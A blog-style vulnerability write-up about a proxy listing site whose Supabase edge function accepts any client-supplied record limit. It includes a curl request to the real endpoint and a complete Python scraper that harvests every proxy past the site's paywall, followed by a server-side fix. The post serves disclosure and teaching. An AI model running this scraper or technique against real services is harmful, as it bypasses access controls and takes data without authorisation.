Hello! My name is Rei, and today I want to share something interesting I found while browsing a free proxy listing website. The site, called ProxyHub, claims to offer “free premium proxies” but has a pretty serious logic flaw that lets you fetch way more data than intended. I’ll walk you through how I found it, what the vulnerability actually is, and how I wrote a quick Python script to grab all 7,000+ proxies in about 2 seconds.
What is ProxyHub?
ProxyHub is a website built with Lovable (a vibe-coding platform) that lists free HTTP, SOCKS4, and SOCKS5 proxies. The site shows a table of proxies to visitors, but here’s the catch: every time you hit reload, the list changes. You see 20 proxies, then 20 different ones, then 20 more. It looks like there’s a huge pool and you’re only seeing a small slice.
That got me curious.
Discovering the Vulnerability
My first instinct was to check how the site fetches its data. Since it’s a React SPA (Single Page Application), the JavaScript bundle is public. I downloaded the main JS file and started reading through the minified code.
Here’s what I found:
NOTEThe site uses Supabase as its backend. Supabase is a popular open-source alternative to Firebase, and it provides a REST API for your database along with “Edge Functions” for custom server-side logic.
The proxy list isn’t fetched directly from a database table. Instead, the frontend calls a Supabase Edge Function called fetch-proxies. This function accepts a JSON body with two parameters:
{
"type": "HTTP",
"limit": 300
}The type parameter filters by proxy type (HTTP, SOCKS4, SOCKS5), and limit controls how many proxies to return. The frontend defaults to 300 for free users and 500 for VIP users, then randomly picks 20 from that batch to display.
But here’s the problem: there’s no server-side enforcement of the limit. The edge function trusts whatever number you send. I could request 9,999 proxies in a single call.
To make things worse, the Supabase anon key (used for authentication) is embedded directly in the JavaScript bundle. This is actually normal for Supabase apps — the anon key is meant to be public. But it means anyone can call the edge function directly.
The Full Picture
I wrote a quick test using curl:
curl -X POST 'https://vwmhbpgwhfwuwtattset.supabase.co/functions/v1/fetch-proxies' \
-H 'apikey: <anon_key>' \
-H 'Authorization: Bearer <anon_key>' \
-H 'Content-Type: application/json' \
-d '{"limit": 9999}'The response came back with totalAvailable: 326,340. The site claims to have over 326,000 proxies. But when I actually counted the unique ones across multiple calls, the real number was 7,319. The rest are likely duplicates or historical entries.
Building the Fetcher
With that knowledge, I wrote a Python script to automatically fetch all unique proxies. The approach is simple:
- Call the
fetch-proxiesendpoint withlimit=9999 - Collect all returned proxies, deduplicating by
ip:port - Repeat until no new proxies appear
- Save everything to TXT files (plain and with protocol prefix)
Here’s the script:
#!/usr/bin/env python3
import json, time, urllib.request, sys
from datetime import datetime
URL = "https://vwmhbpgwhfwuwtattset.supabase.co/functions/v1/fetch-proxies"
KEY = "<anon_key>"
HEADERS = {"apikey": KEY, "Authorization": f"Bearer {KEY}", "Content-Type": "application/json"}
LIMIT, RETRIES, RETRY_DELAY, NO_NEW_STOP = 9999, 3, 2, 3
def fetch_batch(proxy_type=None):
body = json.dumps({"limit": LIMIT, **({"type": proxy_type.upper()} if proxy_type and proxy_type != "all" else {})}).encode()
for attempt in range(RETRIES):
try:
req = urllib.request.Request(URL, data=body, headers=HEADERS)
with urllib.request.urlopen(req, timeout=30) as r:
res = json.loads(r.read())
if res.get("success"):
return res.get("proxies", []), res.get("totalAvailable", 0)
print(f" API error: {res.get('error')}", file=sys.stderr)
except Exception as e:
print(f" Attempt {attempt + 1} failed: {e}", file=sys.stderr)
if attempt < RETRIES - 1:
time.sleep(RETRY_DELAY * (attempt + 1))
return [], 0
def fetch_all():
seen, no_new = {}, 0
print(f"Fetching proxies...\nEndpoint: {URL}\n")
while no_new < NO_NEW_STOP:
batch, total = fetch_batch()
new = sum(1 for p in batch if (k := f"{p['ip']}:{p['port']}") not in seen and not seen.update({k: p}))
print(f" Batch: {len(batch)} | New: {new} | Unique: {len(seen)} | DB: {total}")
no_new = 0 if new else no_new + 1
time.sleep(0.5)
return list(seen.values())
def main():
proxies = fetch_all()
if not proxies:
print("\nNo proxies fetched.")
return
ts = datetime.now().strftime("%Y%m%d_%H%M%S")
p = f"proxies_{ts}"
print(f"\nSaving {len(proxies)} proxies...")
with open(f"{p}.txt", "w") as f:
f.writelines(f"{x['ip']}:{x['port']}\n" for x in proxies)
print(f" TXT: {p}.txt")
with open(f"{p}_with_proto.txt", "w") as f:
f.writelines(f"{x.get('type','HTTP').lower()}://{x['ip']}:{x['port']}\n" for x in proxies)
print(f" TXT: {p}_with_proto.txt")
types = {}; statuses = {}; countries = {}
for x in proxies:
types[x.get("type","?")] = types.get(x.get("type","?"), 0) + 1
statuses[x.get("status","?")] = statuses.get(x.get("status","?"), 0) + 1
countries[x.get("country","Unknown")] = countries.get(x.get("country","Unknown"), 0) + 1
print(f"\n--- Stats ---\nTotal: {len(proxies)}")
print(f"By type: {dict(sorted(types.items(), key=lambda x: -x[1]))}")
print(f"By status: {statuses}")
print(f"Top countries: {dict(sorted(countries.items(), key=lambda x: -x[1])[:5])}")
if __name__ == "__main__":
main()Results
Running the script takes about 2 seconds. Here’s what I got:
| Metric | Value |
|---|---|
| Total unique proxies | 7,319 |
| SOCKS5 | 2,641 |
| HTTP | 2,385 |
| SOCKS4 | 2,293 |
| Online | 6,447 |
| Offline | 872 |
The script outputs two files:
proxies_*.txt— plainip:portformatproxies_*_with_proto.txt— format likehttp://1.2.3.4:8080
Pool Churn
I was also curious about how stable the proxy pool is, so I ran the script twice — once on May 7 and once on May 8 — and compared the results:
| Metric | Count |
|---|---|
| Old proxies | 7,319 |
| New proxies | 5,740 |
| Kept | 2,825 |
| Removed | 4,494 |
| Added | 2,915 |
| Stability | 38.6% |
That’s huge churn. Only 38.6% of the proxies survived overnight. The site’s health checker probably removes dead proxies and scrapes new ones constantly.
How to Fix It
The vulnerability is straightforward to fix. The fetch-proxies edge function needs to enforce the limit server-side:
const MAX_FREE_LIMIT = 20;
const MAX_VIP_LIMIT = 300;
const { data: { user } } = await supabase.auth.getUser()
const isVip = user ? await checkVipStatus(supabase, user.id) : false;
const maxLimit = isVip ? MAX_VIP_LIMIT : MAX_FREE_LIMIT;
const limit = Math.min(requestBody.limit || MAX_FREE_LIMIT, maxLimit);The frontend randomization of 20 proxies per page load is just cosmetic. Real access control has to happen on the server.
Conclusion
Vibe-coding tools like Lovable are great for quickly building and shipping apps, but they can lead to security oversights when the generated code doesn’t properly handle server-side validation. In this case, the edge function blindly trusts the client, making the entire “premium” paywall meaningless.
If you’re building something similar, always validate and enforce limits on the server side. Never trust the client.
Stay tuned for more!